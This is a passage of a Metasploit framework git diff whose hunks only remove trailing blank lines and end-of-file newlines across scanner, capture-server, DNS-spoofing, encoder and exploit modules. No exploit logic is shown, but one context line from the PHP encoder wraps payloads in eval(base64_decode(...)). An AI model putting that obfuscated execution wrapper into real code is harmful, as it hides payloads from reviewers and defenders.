Msf::Auxiliary -end +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 2df638d113..853c76bac8 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -104,5 +104,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index 08027d1c5c..51bdcf3af3 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -303,6 +303,4 @@ class Metasploit3 < Msf::Auxiliary end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/smb/version.rb b/modules/auxiliary/scanner/smb/version.rb index 3e43c9bc9c..b7a1a366c7 100644 --- a/modules/auxiliary/scanner/smb/version.rb +++ b/modules/auxiliary/scanner/smb/version.rb @@ -142,5 +142,4 @@ class Metasploit3 < Msf::Auxiliary end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index 9c95e1b60b..beae12626f 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -97,4 +97,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index e0cfd0dbe6..281c575347 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -81,6 +81,4 @@ class Metasploit3 < Msf::Auxiliary end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 89edb8c9f7..2347bc878c 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -623,6 +623,4 @@ class Metasploit3 < Msf::Auxiliary ret << "" return ret end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index a6249d4b9e..4eff2d41dc 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -103,5 +103,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 957825807f..6359ec6e65 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -435,5 +435,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 77395a2cac..590c6eab69 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -97,5 +97,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index 6dcc081c95..660454e62f 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -115,5 +115,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 965f8cbbb6..5da13ee161 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -283,5 +283,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index f18ec2ac88..1634370aaf 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -141,5 +141,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index 7347a8cbe3..e45efed271 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -137,5 +137,4 @@ class Metasploit3 < Msf::Auxiliary def on_client_close(c) @state.delete(c) end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 361f4258a3..ee95a0c624 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -111,5 +111,4 @@ class Metasploit3 < Msf::Auxiliary end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 6b6ed04924..a34dd12073 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -198,5 +198,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index f91ba3b884..28d2883138 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -167,5 +167,4 @@ class Metasploit3 < Msf::Auxiliary -end - +end \ No newline at end of file diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 3add50f933..9c1e6135c6 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -488,5 +488,4 @@ class Metasploit3 < Msf::Auxiliary avg_count end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index bb85d975e4..d99b950ca3 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -480,5 +480,4 @@ class Metasploit3 < Msf::Auxiliary avg_count end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index e027f0ca1d..5eed41cff3 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -171,5 +171,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/test/capture.rb b/modules/auxiliary/test/capture.rb index 049cecf0aa..551ec4f4b7 100644 --- a/modules/auxiliary/test/capture.rb +++ b/modules/auxiliary/test/capture.rb @@ -56,6 +56,4 @@ class Metasploit3 < Msf::Auxiliary print_status("Finished sniffing") end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/test/ip_spoof.rb b/modules/auxiliary/test/ip_spoof.rb index ec03da22f4..a9745ca6bf 100644 --- a/modules/auxiliary/test/ip_spoof.rb +++ b/modules/auxiliary/test/ip_spoof.rb @@ -50,5 +50,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/test/recon_passive.rb b/modules/auxiliary/test/recon_passive.rb index 5589edd6a3..444994dbdc 100644 --- a/modules/auxiliary/test/recon_passive.rb +++ b/modules/auxiliary/test/recon_passive.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/test/scanner_batch.rb b/modules/auxiliary/test/scanner_batch.rb index a73f60af52..42720a47b7 100644 --- a/modules/auxiliary/test/scanner_batch.rb +++ b/modules/auxiliary/test/scanner_batch.rb @@ -41,5 +41,4 @@ class Metasploit3 < Msf::Auxiliary print_status("Working on batch #{batch.join(",")}") end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/test/scanner_host.rb b/modules/auxiliary/test/scanner_host.rb index a552dc52fc..901a03296f 100644 --- a/modules/auxiliary/test/scanner_host.rb +++ b/modules/auxiliary/test/scanner_host.rb @@ -38,5 +38,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/test/scanner_range.rb b/modules/auxiliary/test/scanner_range.rb index d7f3747852..444946c1e2 100644 --- a/modules/auxiliary/test/scanner_range.rb +++ b/modules/auxiliary/test/scanner_range.rb @@ -38,5 +38,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 98215b64b6..2b921297e4 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -60,5 +60,4 @@ class Metasploit3 < Msf::Auxiliary rescue Errno::EACCES end end -end - +end \ No newline at end of file diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 4ed86e8d04..ed7d940461 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -126,6 +126,4 @@ class Metasploit3 < Msf::Encoder end -end - - +end \ No newline at end of file diff --git a/modules/encoders/encoder_test.rb.ut.rb b/modules/encoders/encoder_test.rb.ut.rb index 18f4d2d10a..cf42e6540c 100644 --- a/modules/encoders/encoder_test.rb.ut.rb +++ b/modules/encoders/encoder_test.rb.ut.rb @@ -48,4 +48,4 @@ $framework.encoders.each_module { |name, mod| $stderr.puts("#{name.ljust(25)}: Passed: #{passed}, Failed: #{failed}, Unique: #{h.keys.length}") -} +} \ No newline at end of file diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 8592ee28ff..e6eb52555c 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -35,6 +35,4 @@ class Metasploit3 < Msf::Encoder buf end -end - - +end \ No newline at end of file diff --git a/modules/encoders/generic/none.rb.ut.rb b/modules/encoders/generic/none.rb.ut.rb index 1677e8e337..120154cb73 100644 --- a/modules/encoders/generic/none.rb.ut.rb +++ b/modules/encoders/generic/none.rb.ut.rb @@ -39,4 +39,4 @@ class Metasploit3 < Msf::Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index b8011e78cd..76b2590c3f 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -151,6 +151,4 @@ EOS return decoder end -end - - +end \ No newline at end of file diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 20ed941d7f..911eb14d6a 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -151,6 +151,4 @@ EOS return decoder end -end - - +end \ No newline at end of file diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 2934eb5911..d32fed7934 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -64,6 +64,4 @@ class Metasploit3 < Msf::Encoder return "eval(base64_decode(" + b64 + "));" end -end - - +end \ No newline at end of file diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index 48336e1275..0e162d68a8 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -75,6 +75,4 @@ class Metasploit3 < Msf::Encoder::Xor stub end -end - - +end \ No newline at end of file diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index 1218ec6a30..3eb274f2ff 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -75,6 +75,4 @@ class Metasploit3 < Msf::Encoder::Xor state.encoded += [ state.key.to_i ].pack('N') end -end - - +end \ No newline at end of file diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index e5c4d4f935..f2c15d400b 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -68,6 +68,4 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback ) ? false : true) end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index eb8a8015af..1f307c4120 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -71,6 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum def encode_end(state) state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator() end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index b421fd6bac..4931bb5a45 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -71,6 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum def encode_end(state) state.encoded += Rex::Encoder::Alpha2::AlphaUpper::add_terminator() end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 5cca792026..f4fcba731b 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -279,6 +279,4 @@ class Metasploit3 < Msf::Encoder ((val >= 0x41 and val <= 0x5a) or val >= 0x80) or Rex::Text.badchar_index([val].pack('C'), state.badchars) end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index ee2d1df313..e0697e2732 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -51,6 +51,4 @@ class Metasploit3 < Msf::Encoder::Xor return decoder end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/call4_dword_xor.rb.ut.rb b/modules/encoders/x86/call4_dword_xor.rb.ut.rb index 24f415ff15..9f2685f44d 100644 --- a/modules/encoders/x86/call4_dword_xor.rb.ut.rb +++ b/modules/encoders/x86/call4_dword_xor.rb.ut.rb @@ -54,4 +54,4 @@ class Metasploit3 < Msf::Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 73dbeb0b59..1ea3ff0cc4 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -64,6 +64,4 @@ class Metasploit3 < Msf::Encoder::Xor [ block.unpack('C')[0] ^ (state.context - 1) ].pack('C') end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/countdown.rb.ut.rb b/modules/encoders/x86/countdown.rb.ut.rb index e76f5bd8e8..8d31e0273d 100644 --- a/modules/encoders/x86/countdown.rb.ut.rb +++ b/modules/encoders/x86/countdown.rb.ut.rb @@ -52,4 +52,4 @@ class Metasploit3 < Msf::Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index 3f87edc924..d41ff05f88 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -55,6 +55,4 @@ class Metasploit3 < Msf::Encoder::Xor return decoder end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/fnstenv_mov.rb.ut.rb b/modules/encoders/x86/fnstenv_mov.rb.ut.rb index 388f6a7cc2..b76ca0cc11 100644 --- a/modules/encoders/x86/fnstenv_mov.rb.ut.rb +++ b/modules/encoders/x86/fnstenv_mov.rb.ut.rb @@ -53,4 +53,4 @@ class Metasploit3 < Msf::Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 532384d2c8..9f9d5958ca 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -120,6 +120,4 @@ protected Rex::Arch::X86::ESI ], nil, state.badchars) end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index 4156fd76e8..6cbf3e5ba1 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -65,6 +65,4 @@ class Metasploit3 < Msf::Encoder::NonAlpha state.encoded.gsub!(/B/, (state.decoder_key_size+5).chr) state.encoded[0x24, 0] = state.key end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index 413c445c60..93960789ba 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -65,6 +65,4 @@ class Metasploit3 < Msf::Encoder::NonUpper state.encoded.gsub!(/B/, (state.decoder_key_size+5).chr) state.encoded[0x24, 0] = state.key end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index bef027be3f..3542f290ef 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -195,6 +195,4 @@ protected Rex::Arch::X86::ECX ], nil, state.badchars) end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index d612805909..79fafb61c8 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -71,6 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum Rex::Text.to_unicode(buffer) end -end - - +end \ No newline at end of file diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 3251c25c4e..c76a65c50d 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -71,6 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum Rex::Text.to_unicode(buffer) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 576edad1a7..bc92e7eccf 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -89,5 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 12628c45eb..c1476cefd2 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -86,6 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - - +end \ No newline at end of file diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index fbdee8af48..249236b7be 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -101,5 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 02028c2e24..44f1d9544e 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -79,5 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Payload: #{payload.encoded}") end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 8f8e2e1ebc..bafd21e5c4 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -122,5 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 71d7e9b30f..4ff17c4a8b 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -89,5 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 7a708c46f7..80d8f939b6 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -94,5 +94,4 @@ DataSegSize=0x4000 disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index e3a7dcd662..b9556bb947 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -72,5 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index c1299e1bf0..b7acf79d1a 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -106,6 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - - +end \ No newline at end of file diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index c3abe25843..acfc190848 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index 28df2fd7b3..1ff5f1f61a 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -353,5 +353,4 @@ end return frame end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index 52d90d3632..1cd94ea1ed 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -71,7 +71,4 @@ require 'msf/core' end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index a51e6a74b4..253e8935ac 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -124,7 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index a00d514deb..451f496b16 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -115,7 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 221d9efceb..b999cabb5f 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -115,7 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index 7b1e207206..8515f18fe6 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -113,7 +113,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/linux/mysql/mysql_yassl.rb b/modules/exploits/linux/mysql/mysql_yassl.rb index ce0424cddd..ab7f82a77b 100644 --- a/modules/exploits/linux/mysql/mysql_yassl.rb +++ b/modules/exploits/linux/mysql/mysql_yassl.rb @@ -76,5 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 0567c0c994..78afc2a75b 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -125,5 +125,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index 669adc8214..3cb4333c3b 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -139,5 +139,4 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(req) end -end - +end \ No newline at end of file diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 2f3975b352..1647e940e2 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -318,5 +318,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index cc45f5794e..26c84cc6db 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -118,5 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote | end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index a88676e717..4e64c7dc69 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -170,5 +170,4 @@ class Metasploit3 < Msf::Exploit::Remote | end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index 56e5c585de..4a2f3b8ea0 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -132,5 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote Please wait... | end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index d34f0f00a7..bed31ef94f 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -210,5 +210,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index b9bc45f851..2f998a4517 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -59,5 +59,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index f17052d676..e2500e234a 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -97,6 +97,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index 3ea852b2f5..3882eafc3f 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -434,5 +434,4 @@ class Metasploit3 < Msf::Exploit::Remote str.gsub(';') { |s| sprintf("%%%.2x", s[0]) } end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 3b8ec24a36..c3cdb122fa 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -88,6 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - - +end \ No newline at end of file diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 398c246d62..c7718248bc 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -153,5 +153,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index cb3d34c5cb..7704da629b 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -131,6 +131,4 @@ class Metasploit3 < Msf::Exploit::Remote "#{buf.length}:" + buf end -end - - +end \ No newline at end of file diff --git 